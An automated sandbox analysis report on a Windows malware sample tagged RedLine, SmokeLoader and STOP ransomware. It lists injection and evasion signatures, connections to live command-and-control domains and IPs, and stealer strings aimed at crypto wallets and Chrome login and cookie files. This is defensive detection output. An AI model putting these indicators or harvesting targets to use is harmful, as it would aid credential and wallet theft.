vlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259
          Source: explorer.exe, 00000004.00000000.285953189.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: M8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sR
          Source: llpb1133.exe, 00000014.00000003.520897937.00000000004A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00428390 FindFirstFileExW,11_2_00428390
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092B91D push dword ptr fs:[00000030h]0_2_0092B91D
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0041E1B1 mov ecx, dword ptr fs:[00000030h]11_2_0041E1B1
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042950B mov eax, dword ptr fs:[00000030h]11_2_0042950B
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00413DCA
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042BCAF GetProcessHeap,11_2_0042BCAF
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00414035
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00413DCA
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00417E53
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413F2C SetUnhandledExceptionFilter,11_2_00413F2C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 37.34.248.24 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: perficut.at
          Source: C:\Windows\explorer.exeDomain query: potunulit.org
          Source: C:\Windows\explorer.exeNetwork Connect: 190.219.54.242 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.106.124.133 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 195.158.3.162 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 158.69.96.67 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 77.73.134.27 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: flytourchip.com.br
          Source: C:\Windows\explorer.exeFile created: D8D3.exe.4.drJump to dropped file
          Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeMemory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeMemory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\3046.exeMemory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeMemory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 5791B14Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeThread created: unknown EIP: 58A19A0Jump to behavior
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeSection unmapped: unknown base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\3046.exeSection unmapped: unknown base address: 400000
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeSection unmapped: unknown base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.290368021.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.284034500.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,11_2_0042B0E9
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,11_2_0042B3D6
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,11_2_0042B38B
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,11_2_0042B471
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,11_2_00423431
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_0042B4FC
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,11_2_0042B74F
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_0042B878
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetLocaleInfoW,11_2_0042B97E
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0042BA4D
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: EnumSystemLocalesW,11_2_00422F0B
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A33B.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413A75 cpuid 11_2_00413A75
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00413CC0
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,11_2_004041D0

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
          Source: D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\exodus\*w
          Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Windows Management Instrumentation
          1
          Registry Run Keys / Startup Folder
          512
          Process Injection
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium13
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules
          1
          Services File Permissions Weakness
          1
          Registry Run Keys / Startup Folder
          1
          Deobfuscate/Decode Files or Information
          1
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol3
          Data from Local System
          Exfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Exploitation for Client Execution
          Logon Script (Windows)1
          Services File Permissions Weakness
          21
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Input Capture
          Automated Exfiltration4
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
          Software Packing
          NTDS144
          System Information Discovery
          Distributed Component Object Model2
          Clipboard Data
          Scheduled Transfer125
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          File Deletion
          LSA Secrets421
          Security Software Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common11
          Masquerading
          Cached Domain Credentials21
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Virtualization/Sandbox Evasion
          DCSync13
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job512
          Process Injection
          Proc Filesystem1
          Application Window Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Hidden Files and Directories
          /etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
          Services File Permissions Weakness
          Network Sniffing1
          Remote System Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 800784 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 86 api.2ip.ua 2->86 116 Multi AV Scanner detection for domain / URL 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 Antivirus detection for URL or domain 2->120 122 12 other signatures 2->122 11 file.exe 2->11         started        14 sievwvt 2->14         started        16 3046.exe 2->16         started        signatures3 process4 signatures5 160 Detected unpacking (changes PE section rights) 11->160 162 Maps a DLL or memory area into another process 11->162 164 Checks if the current machine is a virtual machine (disk enumeration) 11->164 166 Creates a thread in another existing process (thread injection) 11->166 18 explorer.exe 12 29 11->18 injected 168 Multi AV Scanner detection for dropped file 14->168 170 Machine Learning detection for dropped file 14->170 process6 dnsIp7 88 flytourchip.com.br 158.69.96.67 OVHFR Canada 18->88 90 23.106.124.133 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Singapore 18->90 92 5 other IPs or domains 18->92 62 C:\Users\user\AppData\Roaming\sievwvt, PE32 18->62 dropped 64 C:\Users\user\AppData\Roaming\jhevwvt, PE32 18->64 dropped 66 C:\Users\user\AppData\Local\Temp\FB61.exe, PE32 18->66 dropped 68 9 other malicious files 18->68 dropped 124 System process connects to network (likely due to code injection or exploit) 18->124 126 Benign windows process drops PE files 18->126 128 Deletes itself after installation 18->128 130 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->130 23 A33B.exe 5 18->23         started        27 3046.exe 18->27         started        29 D8D3.exe 23 18->29         started        32 6 other processes 18->32 file8 signatures9 process10 dnsIp11 70 C:\Users\user\AppData\Local\Temp\pliu.exe, PE32 23->70 dropped 72 C:\Users\user\AppData\Local\...\llpb1133.exe, PE32+ 23->72 dropped 74 C:\Users\user\AppData\Local\...\XandETC.exe, PE32+ 23->74 dropped 136 Antivirus detection for dropped file 23->136 138 Machine Learning detection for dropped file 23->138 34 llpb1133.exe 23->34         started        37 pliu.exe 23->37         started        39 XandETC.exe 23->39         started        140 Multi AV Scanner detection for dropped file 27->140 142 Detected unpacking (changes PE section rights) 27->142 144 Detected unpacking (overwrites its own PE header) 27->144 146 Injects a PE file into a foreign processes 27->146 41 3046.exe 1 15 27->41         started        96 62.204.41.134 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->96 76 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 29->76 dropped 78 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 29->78 dropped 80 C:\Users\user\AppData\LocalLow\nss3.dll, PE32 29->80 dropped 82 4 other files (2 malicious) 29->82 dropped 148 Tries to harvest and steal browser information (history, passwords, etc) 29->148 150 Tries to steal Crypto Currency Wallets 29->150 98 star-mini.c10r.facebook.com 157.240.253.35 FACEBOOKUS United States 32->98 100 iueg.aappatey.com 45.66.159.142 ENZUINC-US Russian Federation 32->100 102 2 other IPs or domains 32->102 152 Maps a DLL or memory area into another process 32->152 154 Sample uses process hollowing technique 32->154 156 Tries to detect virtualization through RDTSC time measurements 32->156 158 2 other signatures 32->158 45 WerFault.exe 32->45         started        file12 signatures13 process14 dnsIp15 106 Antivirus detection for dropped file 34->106 108 Multi AV Scanner detection for dropped file 34->108 110 Machine Learning detection for dropped file 34->110 114 2 other signatures 34->114 112 Creates processes via WMI 37->112 47 pliu.exe 37->47         started        51 conhost.exe 37->51         started        94 api.2ip.ua 162.0.217.254 ACPCA Canada 41->94 84 C:\Users\user\AppData\Local\...\3046.exe, PE32 41->84 dropped 53 3046.exe 41->53         started        56 icacls.exe 41->56         started        file16 signatures17 process18 dnsIp19 104 xv.yxzgamen.com 188.114.97.3 CLOUDFLARENETUS European Union 47->104 60 C:\Users\user\AppData\Local\Temp\db.dll, PE32 47->60 dropped 58 conhost.exe 47->58         started        132 Sample uses process hollowing technique 53->132 134 Injects a PE file into a foreign processes 53->134 file20 signatures21 process22

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe49%ReversingLabsWin32.Trojan.RedLine
          file.exe34%VirustotalBrowse
          file.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\98D7.exe100%AviraHEUR/AGEN.1210601
          C:\Users\user\AppData\Local\Temp\llpb1133.exe100%AviraHEUR/AGEN.1210601
          C:\Users\user\AppData\Local\Temp\A33B.exe100%AviraHEUR/AGEN.1234960
          C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\12C0.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\D8D3.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\FB61.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\98D7.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\ECFB.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\sievwvt100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\llpb1133.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\3046.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\E4.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\jhevwvt100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\4113.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\A33B.exe100%Joe Sandbox ML
          C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
          C:\Users\user\AppData\LocalLow\vcruntime140.dll0%ReversingLabs
          C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe62%ReversingLabsWin32.Ransomware.Stop
          C:\Users\user\AppData\Local\Temp\3046.exe62%ReversingLabsWin32.Ransomware.Stop
          C:\Users\user\AppData\Local\Temp\4113.exe82%ReversingLabsWin32.Trojan.SmokeLoader
          C:\Users\user\AppData\Local\Temp\98D7.exe77%ReversingLabsWin64.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\ECFB.exe56%ReversingLabsWin32.Trojan.RedLine
          C:\Users\user\AppData\Local\Temp\XandETC.exe92%ReversingLabsWin64.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\db.dll42%ReversingLabsWin32.Trojan.Ulise
          C:\Users\user\AppData\Local\Temp\llpb1133.exe77%ReversingLabsWin64.Trojan.Generic
          C:\Users\user\AppData\Local\Temp\pliu.exe85%ReversingLabsWin32.Backdoor.Manuscrypt
          C:\Users\user\AppData\Roaming\sievwvt49%ReversingLabsWin32.Trojan.RedLine
          SourceDetectionScannerLabelLinkDownload
          18.2.ECFB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          17.2.E4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          11.2.4113.exe.400000.0.unpack100%AviraHEUR/AGEN.1213203Download File
          15.2.3046.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
          14.0.A33B.exe.7b0000.0.unpack100%AviraHEUR/AGEN.1234960Download File
          0.3.file.exe.6d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          17.3.E4.exe.7e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          18.3.ECFB.exe.6e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          27.2.pliu.exe.400000.0.unpack100%AviraHEUR/AGEN.1241636Download File
          0.2.file.exe.680e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          40.2.pliu.exe.400000.0.unpack100%AviraHEUR/AGEN.1241636Download File
          18.2.ECFB.exe.6d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
